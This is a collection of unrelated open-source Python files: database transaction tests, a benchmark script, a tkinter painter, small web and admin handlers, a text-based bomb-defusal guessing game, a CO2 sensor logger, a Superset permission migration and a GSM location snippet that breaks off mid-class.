oid_list = (oid1, oid2) = self.makeOID(1), self.makeOID(2)
uuid_list = uuid1, uuid2 = self.getStorageUUID(), self.getStorageUUID()
client_uuid = self.getClientUUID()
# create transaction manager
callback = Mock()
txnman = TransactionManager(on_commit=callback)
self.assertFalse(txnman.hasPending())
self.assertEqual(txnman.registerForNotification(uuid1), [])
# begin the transaction
ttid = txnman.begin(node)
self.assertTrue(ttid is not None)
self.assertEqual(len(txnman.registerForNotification(uuid1)), 1)
self.assertTrue(txnman.hasPending())
# prepare the transaction
tid = txnman.prepare(ttid, 1, oid_list, uuid_list, msg_id)
self.assertTrue(txnman.hasPending())
self.assertEqual(txnman.registerForNotification(uuid1), [ttid])
txn = txnman[ttid]
self.assertEqual(txn.getTID(), tid)
self.assertEqual(txn.getUUIDList(), list(uuid_list))
self.assertEqual(txn.getOIDList(), list(oid_list))
# lock nodes
txnman.lock(ttid, uuid1)
self.assertEqual(len(callback.getNamedCalls('__call__')), 0)
txnman.lock(ttid, uuid2)
self.assertEqual(len(callback.getNamedCalls('__call__')), 1)
self.assertEqual(txnman.registerForNotification(uuid1), [])
def test_storageLost(self):
client1 = Mock({'__hash__': 1})
client2 = Mock({'__hash__': 2})
client3 = Mock({'__hash__': 3})
storage_1_uuid = self.getStorageUUID()
storage_2_uuid = self.getStorageUUID()
oid_list = [self.makeOID(1), ]
tm = TransactionManager(lambda tid, txn: None)
# Transaction 1: 2 storage nodes involved, one will die and the other
# already answered node lock
msg_id_1 = 1
ttid1 = tm.begin(client1)
tid1 = tm.prepare(ttid1, 1, oid_list,
[storage_1_uuid, storage_2_uuid], msg_id_1)
tm.lock(ttid1, storage_2_uuid)
t1 = tm[ttid1]
self.assertFalse(t1.locked())
# Storage 1 dies:
# t1 is over
self.assertTrue(t1.storageLost(storage_1_uuid))
self.assertEqual(t1.getUUIDList(), [storage_2_uuid])
del tm[ttid1]
# Transaction 2: 2 storage nodes involved, one will die
msg_id_2 = 2
ttid2 = tm.begin(client2)
tid2 = tm.prepare(ttid2, 1, oid_list,
[storage_1_uuid, storage_2_uuid], msg_id_2)
t2 = tm[ttid2]
self.assertFalse(t2.locked())
# Storage 1 dies:
# t2 still waits for storage 2
self.assertFalse(t2.storageLost(storage_1_uuid))
self.assertEqual(t2.getUUIDList(), [storage_2_uuid])
self.assertTrue(t2.lock(storage_2_uuid))
del tm[ttid2]
# Transaction 3: 1 storage node involved, which won't die
msg_id_3 = 3
ttid3 = tm.begin(client3)
tid3 = tm.prepare(ttid3, 1, oid_list, [storage_2_uuid, ],
msg_id_3)
t3 = tm[ttid3]
self.assertFalse(t3.locked())
# Storage 1 dies:
# t3 doesn't care
self.assertFalse(t3.storageLost(storage_1_uuid))
self.assertEqual(t3.getUUIDList(), [storage_2_uuid])
self.assertTrue(t3.lock(storage_2_uuid))
del tm[ttid3]
def testTIDUtils(self):
"""
Tests packTID/unpackTID/addTID.
"""
min_tid = pack('!LL', 0, 0)
min_unpacked_tid = ((1900, 1, 1, 0, 0), 0)
max_tid = pack('!LL', 2**32 - 1, 2 ** 32 - 1)
# ((((9917 - 1900) * 12 + (10 - 1)) * 31 + (14 - 1)) * 24 + 4) * 60 +
# 15 == 2**32 - 1
max_unpacked_tid = ((9917, 10, 14, 4, 15), 2**32 - 1)
self.assertEqual(unpackTID(min_tid), min_unpacked_tid)
self.assertEqual(unpackTID(max_tid), max_unpacked_tid)
self.assertEqual(packTID(*min_unpacked_tid), min_tid)
self.assertEqual(packTID(*max_unpacked_tid), max_tid)
self.assertEqual(addTID(min_tid, 1), pack('!LL', 0, 1))
self.assertEqual(addTID(pack('!LL', 0, 2**32 - 1), 1),
pack('!LL', 1, 0))
self.assertEqual(addTID(pack('!LL', 0, 2**32 - 1), 2**32 + 1),
pack('!LL', 2, 0))
# Check impossible dates are avoided (2010/11/31 doesn't exist)
self.assertEqual(
unpackTID(addTID(packTID((2010, 11, 30, 23, 59), 2**32 - 1), 1)),
((2010, 12, 1, 0, 0), 0))
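        # Added annotation (inferred from the packed/unpacked values above, not
        # part of the original test): a TID is two big-endian 32-bit words.  The
        # high word encodes (year, month, day, hour, minute) as
        #   ((((year - 1900) * 12 + (month - 1)) * 31 + (day - 1)) * 24 + hour) * 60 + minute
        # and the low word is a sub-minute serial, which is why
        # pack('!LL', 2**32 - 1, 2**32 - 1) unpacks to ((9917, 10, 14, 4, 15), 2**32 - 1).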
def testTransactionLock(self):
"""
Transaction lock is present to ensure invalidation TIDs are sent in
strictly increasing order.
        Note: this implementation might change later, to allow more parallelism.
"""
client_uuid, client = self.makeNode(NodeTypes.CLIENT)
tm = TransactionManager(lambda tid, txn: None)
# With a requested TID, lock spans from begin to remove
ttid1 = self.getNextTID()
ttid2 = self.getNextTID()
tid1 = tm.begin(client, ttid1)
self.assertEqual(tid1, ttid1)
del tm[ttid1]
# Without a requested TID, lock spans from prepare to remove only
ttid3 = tm.begin(client)
ttid4 = tm.begin(client) # Doesn't raise
node = Mock({'getUUID': client_uuid, '__hash__': 0})
tid4 = tm.prepare(ttid4, 1, [], [], 0)
del tm[ttid4]
tm.prepare(ttid3, 1, [], [], 0)
def testClientDisconectsAfterBegin(self):
client_uuid1, node1 = self.makeNode(NodeTypes.CLIENT)
tm = TransactionManager(lambda tid, txn: None)
tid1 = self.getNextTID()
tid2 = self.getNextTID()
tm.begin(node1, tid1)
tm.clientLost(node1)
self.assertTrue(tid1 not in tm)
def testUnlockPending(self):
callback = Mock()
uuid1, node1 = self.makeNode(NodeTypes.CLIENT)
uuid2, node2 = self.makeNode(NodeTypes.CLIENT)
storage_uuid = self.getStorageUUID()
tm = TransactionManager(callback)
ttid1 = tm.begin(node1)
ttid2 = tm.begin(node2)
tid1 = tm.prepare(ttid1, 1, [], [storage_uuid], 0)
tid2 = tm.prepare(ttid2, 1, [], [storage_uuid], 0)
tm.lock(ttid2, storage_uuid)
# txn 2 is still blocked by txn 1
self.assertEqual(len(callback.getNamedCalls('__call__')), 0)
tm.lock(ttid1, storage_uuid)
# both transactions are unlocked when txn 1 is fully locked
self.assertEqual(len(callback.getNamedCalls('__call__')), 2)
if __name__ == '__main__':
unittest.main()
| vpelletier/neoppod | neo/tests/master/testTransactions.py | Python | gpl-2.0 | 8,633 |
#!/usr/bin/env python
# Copyright 2014-2019 Thomas Schatz, Mathieu Bernard, Roland Thiolliere
#
# This file is part of h5features.
#
# h5features is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# h5features is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with h5features. If not, see <http://www.gnu.org/licenses/>.
"""Comparing execution times of h5features 1.0 and 1.1 versions."""
import argparse
import timeit
# import cProfile
# import os
from aux import generate
import aux.h5features_v1_0 as h5f
from aux.utils import remove
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--nitems',
help='number of items to generate',
default=10000, type=int)
parser.add_argument('-d', '--dimension',
help='features dimension',
default=20, type=int)
parser.add_argument('-f', '--max_frames',
help='maximal number of frames per items',
default=10, type=int)
parser.add_argument('-n', '--ntimes',
help='number of times each operation is timed',
default=10, type=int)
parser.add_argument('-r', '--repeat',
                        help='number of repetitions (the lowest time is reported)',
default=3, type=int)
return parser.parse_args()
def timeme(cmd, setup, args):
return min(timeit.repeat(
cmd, setup=setup, number=args.ntimes, repeat=args.repeat))
if __name__ == '__main__':
args = parse_args()
print('Parameters are i={}, d={}, f={}, n={}, r={}'
.format(args.nitems, args.dimension, args.max_frames,
args.ntimes, args.repeat))
data = generate.full_data(args.nitems, args.dimension, args.max_frames)
filename = 'test.h5'
groupname = 'group'
v10_setup = """\
import aux.h5features_v1_0 as h5f
from aux.utils import remove
from __main__ import data, filename, groupname
"""
v10_write = """\
remove(filename)
h5f.write(filename, groupname, data.items(), data.labels(), data.features())
"""
v11_setup = """\
import h5features as h5f
from aux.utils import remove
from __main__ import data, filename, groupname
"""
v11_write = """\
remove(filename)
h5f.Writer(filename).write(data, groupname)
"""
read = "h5f.read(filename, groupname)"
print('Writing:')
print(' 1.0: ', timeme(v10_write, v10_setup, args))
print(' 1.1: ', timeme(v11_write, v11_setup, args))
print('Reading:')
remove(filename)
h5f.write(
filename, groupname, data.items(), data.labels(), data.features())
print(' 1.0: ', timeme(read, v10_setup, args))
print(' 1.1: ', timeme(read, v11_setup, args))
# cProfile.run(v10_setup + '\n' + v10_write, 'stats0')
# remove(data['filename'])
# cProfile.run(v11_setup + '\n' + v11_write, 'stats1')
# remove(data['filename'])
| bootphon/h5features | test/perfs.py | Python | gpl-3.0 | 3,410 |
# encoding: utf-8
import tkinter
class Painter:
def __init__(self, width=1200, height=800, bg='white'):
self.root = tkinter.Tk()
        self.canvas = tkinter.Canvas(self.root, width=width, height=height, bd=5, bg=bg)
self.canvas.pack()
def add_point(self, x, y, color, radius):
left_top = (x-radius, y-radius)
right_bottom = (x+radius, y+radius)
# print(color)
        # pack (r, g, b) into a 24-bit value and format it as a '#rrggbb' colour string
        color_value = color[0]*0x10000 + color[1]*0x100 + color[2]
        color_sign = '#{:06x}'.format(color_value)
# print(color_sign)
self.canvas.create_oval(left_top[0],
left_top[1],
right_bottom[0],
right_bottom[1],
fill=color_sign,
width=0
)
def paint_point_list(self, l: list):
for i in l:
self.add_point(i[0], i[1], i[2], i[3]) | neveralso/CompilerAssignment | gui.py | Python | gpl-2.0 | 1,173 |
import Handler, Mdb, Security, Template, Util
from bongo import MDB
def CreateAlias(req):
if not req.fields.has_key('newaliasname'):
return Handler.SendMessage(req, 'Alias CN is required')
if not req.fields.has_key('newaliasref'):
return Handler.SendMessage(req, 'Aliased object is required')
aliasname = req.fields.getfirst('newaliasname').value
aliasref = req.fields.getfirst('newaliasref').value
attributes = {}
attributes[req.mdb.A_ALIASED_OBJECT_NAME] = aliasref
    context = req.mdb.default_context
req.mdb.AddObject(context + '\\' + aliasname, req.mdb.C_ALIAS, attributes)
return Handler.SendMessage(req, 'Alias created successfully')
| bongo-project/bongo | src/libs/python/bongo/admin/Alias.py | Python | gpl-2.0 | 694 |
# encoding: utf-8
import cgi
import json
import logging
import os
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'])
def ReadDecks():
decks = []
json_dir = os.path.join(os.path.dirname(__file__), "json")
for dirname, dirnames, filenames in os.walk(json_dir):
for filename in filenames:
try:
decks.append(json.loads(open(
os.path.join(dirname, filename), "r").read()))
except Exception:
                print "Failed to load flashcard deck %s" % filename
return decks
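# Annotation (added note, inferred from the handler below rather than stated in
# the original file): each JSON file under json/ is expected to decode to an
# object shaped roughly like
#
#     {"name": "<deck name>", "cards": [ ... flashcard entries ... ]}
#
# since MainPage matches decks by d["name"] and serialises deck["cards"].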
class MainPage(webapp2.RequestHandler):
def get(self, *args):
decks = ReadDecks()
deck_name = None
if args:
deck_name = args[0]
# user = users.get_current_user()
# login_url = None
# logout_url = None
# if user:
# logout_url = users.create_logout_url('/')
# else:
# login_url = users.create_login_url(self.request.uri) # 'http://www.google.com'
path = os.path.join(os.path.dirname(__file__), 'FlashCardChEng.html')
# Find which deck they want.
deck = None
if deck_name:
valid_decks = [d for d in decks if d["name"] == deck_name]
if valid_decks:
deck = valid_decks[0]
if not deck:
deck = decks[0]
template_args = {
"deck_found": bool(deck),
"content_json": json.dumps(deck["cards"]) if deck else "",
# 'user': user,
# 'login_url': login_url,
# 'logout_url': logout_url,
"deck_names": [d["name"] for d in decks],
}
self.response.out.write(template.render(path, template_args))
application = webapp2.WSGIApplication([
("/", MainPage),
("/(.*)", MainPage),
])
| ebaumstarck/funwebdev | FlashCard/flashcards.py | Python | bsd-3-clause | 1,945 |
# article_selector.py
class ArticleSelector():
"""
This script is designed to set up an experiment by selecting
training, development and test sets out of a large corpus of
articles. The corpus in mind is the Westbury Lab Wikipedia
Corpus.
It randomly chooses n articles out of a set m >= n articles. It
then splits them into the required sets approximating a specified
distribution. m must be known in advance.
The default proportions are 60/20/20%, and the default separating
line is "---END.OF.DOCUMENT---\n", the WestburyLab separator.
"""
def __init__(self, article_file_obj, train_file_obj, devel_file_obj, test_file_obj, article_separation_line="---END.OF.DOCUMENT---\n") :
self.article_file_obj = article_file_obj
self.train_file_obj = train_file_obj
self.devel_file_obj = devel_file_obj
self.test_file_obj = test_file_obj
self.article_separation_line = article_separation_line
def select_and_distribute(self, rand_obj, m, n, proportions=[.6,.2,.2]):
assert sum(proportions) == 1, proportions
selection = rand_obj.sample(xrange(m),n)
slices = [int(n*proportions[0]), int(n*(proportions[0]+proportions[1]))]
training_indices = selection[:slices[0]]
development_indices = selection[slices[0]:slices[1]]
test_indices = selection[slices[1]:]
article_number = 0
article = ''
line = self.article_file_obj.readline()
while line:
while line != self.article_separation_line:
article += line
line = self.article_file_obj.readline()
article += line
line = self.article_file_obj.readline() # blank between articles
article += line
if article_number in selection:
if article_number in training_indices:
self.train_file_obj.write(article)
elif article_number in development_indices:
self.devel_file_obj.write(article)
else:
assert article_number in test_indices
self.test_file_obj.write(article)
article_number += 1
article = ''
line = self.article_file_obj.readline()
return training_indices, development_indices, test_indices
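
# Minimal usage sketch (added annotation; the file names and counts are made up,
# only the API above is real):
#
#     import random
#     selector = ArticleSelector(open('corpus.txt'), open('train.txt', 'w'),
#                                open('devel.txt', 'w'), open('test.txt', 'w'))
#     selector.select_and_distribute(random.Random(42), m=10000, n=1000)
#
# m is the total number of articles in corpus.txt and must be known in advance;
# n of them are sampled and written out in roughly 60/20/20 proportions.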
| ambimorph/recluse | recluse/article_selector.py | Python | agpl-3.0 | 2,389 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v9.errors",
marshal="google.ads.googleads.v9",
manifest={"ConversionActionErrorEnum",},
)
class ConversionActionErrorEnum(proto.Message):
r"""Container for enum describing possible conversion action
errors.
"""
class ConversionActionError(proto.Enum):
r"""Enum describing possible conversion action errors."""
UNSPECIFIED = 0
UNKNOWN = 1
DUPLICATE_NAME = 2
DUPLICATE_APP_ID = 3
TWO_CONVERSION_ACTIONS_BIDDING_ON_SAME_APP_DOWNLOAD = 4
BIDDING_ON_SAME_APP_DOWNLOAD_AS_GLOBAL_ACTION = 5
DATA_DRIVEN_MODEL_WAS_NEVER_GENERATED = 6
DATA_DRIVEN_MODEL_EXPIRED = 7
DATA_DRIVEN_MODEL_STALE = 8
DATA_DRIVEN_MODEL_UNKNOWN = 9
CREATION_NOT_SUPPORTED = 10
UPDATE_NOT_SUPPORTED = 11
__all__ = tuple(sorted(__protobuf__.manifest))
| googleads/google-ads-python | google/ads/googleads/v9/errors/types/conversion_action_error.py | Python | apache-2.0 | 1,543 |
#This script runs a game using basic conditional constructs: conditional, alternative and chained execution,
#raw_input, type conversions, main functions, relational operators, logical operators, random.randint(), and str.format().
#The game involves a bomb: you need to cut the right circuit to stop the timer. Otherwise, you die.
import random
# RULES
# conditional execution-1
# raw_input
def rules():
print "HI! I MADE THIS GAME! AND I AM BOMIN!"
rulesorno = raw_input("You wanna hear the rules? (yes/no):")
if rulesorno == "yes" or rulesorno == "no":
print "You have to know anyways, so yeah. You CANNOT write in capital letters. ALL of them should be LOWERCASED."
#introduction
# str.format()
# """ """
def intro():
name = raw_input("So. What's your name..?:")
if not name == "Innhye":
print "Hi there..."
    out = """Clock is ticking. Patients, doctors, staff... they are all standing still,
staring at one thing... and it is, a bomb. The countdown has started: 30 seconds remaining... There's no time to spare.
There's a person in the middle, at this hospital full of patients and doctors... tensed up. That person is holding it - everything, EVERYTHING depends on that person.
{}. That's you.""".format(name)
print out
#3. first cut!!!
# chained conditionals -1
def firstcut():
print "You are looking at the bomb right now. There are three circuits attached on the bomb. Right? And, they are: red, blue, and green."
cut1 = raw_input("Type the color of the circuit that you would like to cut:")
if cut1 == "red":
cut1 = 1
return cut1
elif cut1 == "blue":
cut1 = 2
return cut1
elif cut1 == "green":
cut1 = 3
return cut1
#You sure?
# chained conditionals -2
def sureornot(cut1):
if cut1 > 1 and cut1 < 3:
sureornot = raw_input("HA. You sure about that? (yes/no):")
if sureornot == "no":
cut1 = raw_input("you're not...?? Type the color again...:")
if cut1 == "red":
cut1 = 1
return cut1
elif cut1 == "blue":
cut1 = 2
return cut1
elif cut1 == "green":
cut1 = 3
                return cut1
    # fall through: keep the current choice (e.g. when the answer was "yes")
    return cut1
#4. dead or alive???!!!
# alternative execution -1
def deadoralive1(cut1, explosion):
if str(cut1) == explosion:
print "BOOM. YOU'RE DEAD."
exit()
else:
print "YAAASSSSS YOU ARE ALIVE. YAS YAS BUT BUT THE BOMB THOUGH. the timer's still running.....!"
#5. second cut!!!!!!!
# chained conditionals-3
#conditional execution-2
def secondcut(explosion):
print "\nNow you have two circuits left. One will stop the timer, and another one will make it explode...what's your choice?"
cut2 = raw_input("Type the color of the circuit that you would like to cut, ALL IN LOWER CASE:")
if cut2 > int(explosion) or cut2 < int(explosion) or cut2 == int(explosion):
sureornot = raw_input("HA. You sure about that? (yes/no):")
if sureornot == "yes" or sureornot == "no":
cut2 = raw_input("NO YOU'RE NOT. OF COURSE YOU AREN'T SURE... Type the color again...:")
if cut2 == "red":
cut2 = 1
elif cut2 == "blue":
cut2 = 2
elif cut2 == "green":
            cut2 = 3
    return cut2
#6. deadoralive 2!!!!
# alternative execution -2
def deadoralive2(cut2, explosion):
if str(cut2) == explosion:
print "BOOM. YOU'RE DEAD."
else:
print "The timer. is. stopped. YOU'RE ALIVE! EVERYONE IS ALIVE! GOOD JOB!!!"
#main
# type conversion
# random.randint
def main():
import random
explosion = str(random.randint(1, 3))
rules()
intro()
cut1 = firstcut()
    cut1 = sureornot(cut1)
deadoralive1(cut1, explosion)
cut2 = secondcut(explosion)
deadoralive2(cut2, explosion)
main()
| bomin2406-cmis/bomin2406-cmis-cs2 | conditionals.py | Python | cc0-1.0 | 3,685 |
#!/usr/bin/python3
import os
import sys
import datetime
import time
try:
import board
import busio
import adafruit_ccs811
except:
print("ccs811 module not installed, install using the gui")
sys.exit()
homedir = os.getenv("HOME")
sensor_log = homedir + "/Pigrow/logs/persistCCS811.txt"
'''
# Currently no settings file information is stored for consistent sensors
sys.path.append(homedir + '/Pigrow/scripts/')
try:
import pigrow_defs
except:
print("pigrow_defs.py not found, unable to continue.")
print("make sure pigrow software is installed correctly")
sys.exit()
loc_dic = pigrow_defs.load_locs(homedir + '/Pigrow/config/dirlocs.txt')
pigrow_settings = pigrow_defs.load_settings(loc_dic['loc_settings'])
'''
# set up and read the sensor
print("Initialising CCS811 sensor")
i2c = busio.I2C(board.SCL, board.SDA)
ccs811 = adafruit_ccs811.CCS811(i2c)
# Wait for the sensor to be ready
while not ccs811.data_ready:
time.sleep(0.1)
pass
# Wait some more for a valid reading after it's initialised
time.sleep(10) # this value is a guess
class sensor_config():
# find connected sensors
def find_settings():
print("connection_type=i2c")
print("connection_address_list=0x5a")
print("default_connection_address=0x5a")
def read_sensor(location="", extra="", sensor_name="", *args):
print("Reading Sensor...")
# start read attempts
read_attempt = 1
co2 = None
while read_attempt < 5:
try:
test_data = []
# second test val
test_val = 0
y = 0
min = 99999999999
max = 0
for x in range(0, 50):
co2 = ccs811.eco2
if not co2 == 0:
y = y + 1
test_val = test_val + co2
if max < co2:
max = co2
if min > co2:
min = co2
time.sleep(0.25)
test_val = round(test_val / y, 2)
v_range = max - min
test_data.append(["co2_ave", test_val])
test_data.append(["co2_ave_range", v_range])
test_data.append(["co2_ave_datapoints", y])
# test again
test2_val = 0
y = 0
for x in range(0, 50):
co2 = ccs811.eco2
if not co2 == 0:
y = y + 1
test2_val = test2_val + co2
time.sleep(0.25)
test2_val = round(test2_val / y, 2)
#print("after delay value ", test2_val)
test_data.append(["co2_ave_2", test2_val])
# final read and log single entry
co2 = ccs811.eco2
tvoc = ccs811.tvoc
            if co2 is None:
print("--problem reading CCS811, try " + str(read_attempt))
time.sleep(2)
read_attempt = read_attempt + 1
else:
logtime = datetime.datetime.now()
data = [['time',logtime], ['co2_spot', co2], ['tvoc_spot',tvoc]]
data = data + test_data
#print(data)
return data
except Exception as e:
print("--exception while reading CCS811, try " + str(read_attempt))
print(" -- " + str(e))
time.sleep(2)
read_attempt = read_attempt + 1
return None
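# Added annotation: read_sensor() returns a list of [name, value] pairs -- time,
# co2_spot and tvoc_spot plus the averaged co2_ave* fields built above -- or None
# after five failed attempts; the __main__ loop below serialises each reading as a
# "name=value>name=value..." line appended to persistCCS811.txt.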
if __name__ == '__main__':
'''
    The CCS811 requires no configuration
'''
# check for command line arguments
sensor_location = "0x5a"
for argu in sys.argv[1:]:
if "=" in argu:
thearg = str(argu).split('=')[0]
thevalue = str(argu).split('=')[1]
if thearg == 'location':
sensor_location = thevalue
elif 'help' in argu or argu == '-h':
print(" Constant loop for the CCS811 Sensor")
print(" ")
print(" For best results the ccs811 should be run on a ")
print(" constant loop, add this script to the startup cron")
print("")
print(" -config ")
print(" display the config information")
print("")
sys.exit(0)
elif argu == "-flags":
print("location=")
sys.exit(0)
elif argu == "-config":
sensor_config.find_settings()
sys.exit()
# read sensor
while True:
sensor_values = read_sensor(location=sensor_location)
if sensor_values == None:
print("!! Failed to read five times !!")
            # should write to the error log here
time.sleep(1)
else:
line = ""
for x in sensor_values:
line = line + str(x[0]) + "=" + str(x[1]) + ">"
line = line[:-1] + "\n"
with open(sensor_log, "a") as f:
f.write(line)
time.sleep(47.5) # the process has about 12.5 seconds of delays in it already
| Pragmatismo/Pigrow | scripts/persistent_sensors/persistent_ccs811.py | Python | gpl-3.0 | 5,035 |
#!/usr/bin/python
# coding: UTF-8
import os
import sys
import urllib2
import partner_pb2
if len(sys.argv) != 2:
print "input url"
sys.exit(0)
url = (sys.argv[1])
all_the_text = urllib2.urlopen(url=url).read()
req = partner_pb2.PartnerData()
req.ParseFromString(all_the_text)
print "attrs"
for ite in req.attrs:
    if ite.id == 89:
        print "体质: %s" % (ite.val)  # 体质 = constitution
    if ite.id == 91:
        print "敏捷: %s" % (ite.val)  # 敏捷 = agility
| tsdfsetatata/xserver | Server/dump_srv/show_partner2.py | Python | gpl-3.0 | 457 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""security converge dashboards
Revision ID: 1f6dca87d1a2
Revises: 4b84f97828aa
Create Date: 2020-12-11 11:45:25.051084
"""
# revision identifiers, used by Alembic.
revision = "1f6dca87d1a2"
down_revision = "4b84f97828aa"
from alembic import op
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm import Session
from superset.migrations.shared.security_converge import (
add_pvms,
get_reversed_new_pvms,
get_reversed_pvm_map,
migrate_roles,
Pvm,
)
NEW_PVMS = {"Dashboard": ("can_read", "can_write",)}
PVM_MAP = {
Pvm("DashboardModelView", "can_add"): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "can_delete"): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "can_download_dashboards",): (
Pvm("Dashboard", "can_read"),
),
Pvm("DashboardModelView", "can_edit",): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "can_favorite_status",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "can_list",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "can_mulexport",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "can_show",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelView", "muldelete",): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelView", "mulexport",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelViewAsync", "can_list",): (Pvm("Dashboard", "can_read"),),
Pvm("DashboardModelViewAsync", "muldelete",): (Pvm("Dashboard", "can_write"),),
Pvm("DashboardModelViewAsync", "mulexport",): (Pvm("Dashboard", "can_read"),),
Pvm("Dashboard", "can_new",): (Pvm("Dashboard", "can_write"),),
}
def upgrade():
bind = op.get_bind()
session = Session(bind=bind)
# Add the new permissions on the migration itself
add_pvms(session, NEW_PVMS)
migrate_roles(session, PVM_MAP)
try:
session.commit()
except SQLAlchemyError as ex:
print(f"An error occurred while upgrading permissions: {ex}")
session.rollback()
def downgrade():
bind = op.get_bind()
session = Session(bind=bind)
# Add the old permissions on the migration itself
add_pvms(session, get_reversed_new_pvms(PVM_MAP))
migrate_roles(session, get_reversed_pvm_map(PVM_MAP))
try:
session.commit()
except SQLAlchemyError as ex:
print(f"An error occurred while downgrading permissions: {ex}")
session.rollback()
pass
| mistercrunch/panoramix | superset/migrations/versions/1f6dca87d1a2_security_converge_dashboards.py | Python | apache-2.0 | 3,258 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{ 'name': 'Turkey - Accounting',
'version': '1.beta',
'category': 'Localization/Account Charts',
'description': """
Türkiye için Tek düzen hesap planı şablonu OpenERP Modülü.
==============================================================================
Bu modül kurulduktan sonra, Muhasebe yapılandırma sihirbazı çalışır
* Sihirbaz sizden hesap planı şablonu, planın kurulacağı şirket,banka hesap bilgileriniz,ilgili para birimi gibi bilgiler isteyecek.
""",
'author': 'Ahmet Altınışık',
'maintainer':'https://launchpad.net/~openerp-turkey',
'website':'https://launchpad.net/openerp-turkey',
'depends': [
'account',
'base_vat',
'account_chart',
],
'init_xml': [],
'update_xml': [
'account_code_template.xml',
'account_tdhp_turkey.xml',
'account_tax_code_template.xml',
'account_chart_template.xml',
'account_tax_template.xml',
'l10n_tr_wizard.xml',
],
'demo_xml': [],
'installable': True,
'images': ['images/chart_l10n_tr_1.jpg','images/chart_l10n_tr_2.jpg','images/chart_l10n_tr_3.jpg'],
'certificate': '0065141563693',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| ksrajkumar/openerp-6.1 | openerp/addons/l10n_tr/__openerp__.py | Python | agpl-3.0 | 2,237 |
import asyncio
import multiprocessing
import time
from indy_common.constants import POOL_RESTART, RESTART_MESSAGE
from indy_node.test.pool_restart.helper import compose_restart_message, \
send_restart_message
from stp_core.loop.eventually import eventually
from indy_node.test.upgrade.helper import NodeControlToolExecutor as NCT, \
nodeControlGeneralMonkeypatching
m = multiprocessing.Manager()
whitelist = ['Unexpected error in _restart test']
def test_node_control_tool_restart(looper, tdir, monkeypatch, tconf):
received = m.list()
msg = RESTART_MESSAGE
stdout = 'teststdout'
def transform(tool):
nodeControlGeneralMonkeypatching(tool, monkeypatch, tdir, stdout)
monkeypatch.setattr(tool, '_process_data', received.append)
def check_message():
assert len(received) == 1
assert received[0] == compose_restart_message(msg)
nct = NCT(backup_dir=tdir, backup_target=tdir, transform=transform)
try:
send_restart_message(msg)
looper.run(eventually(check_message))
finally:
nct.stop()
def test_communication_with_node_control_tool(looper, tdir, tconf, monkeypatch):
received = m.list()
msg = RESTART_MESSAGE
stdout = 'teststdout'
def transform(tool):
nodeControlGeneralMonkeypatching(tool, monkeypatch, tdir, stdout)
monkeypatch.setattr(tool, '_restart', restart_count)
def check_restart_count():
assert len(received) == 1
def restart_count():
received.append(RESTART_MESSAGE)
nct = NCT(backup_dir=tdir, backup_target=tdir, transform=transform)
try:
send_restart_message(msg)
looper.run(eventually(check_restart_count))
finally:
nct.stop()
| spivachuk/sovrin-node | indy_node/test/pool_restart/test_node_control_tool_for_restart.py | Python | apache-2.0 | 1,740 |
# adapted from the application skeleton in the sdk
import e32
import appuifw
import location
import struct
import socket
import threading
class gsm_location :
def __init__(self) :
self.text = u""
self.noRefresh = 0;
def gsm_location(self) :
self.noRefresh = self.noRefresh + 1;
try:
(self.mcc, self.mnc, self.lac, self.cellid) = location.gsm_location()
except:
self.mcc = 0
self.mnc = 0
self.lac = 0
self.cellid = 0
self.text = u"MCC: %s\nMNC: %s\nLAC: %s\nCell id: %s\nnoSamples: %i\n" % (self.mcc, self.mnc, self.lac, self.cellid, self.noRefresh)
return self.text
def close(self) :
pass
e32.ao_yield()
class Client(threading.Thread):
def __init__(self, app):
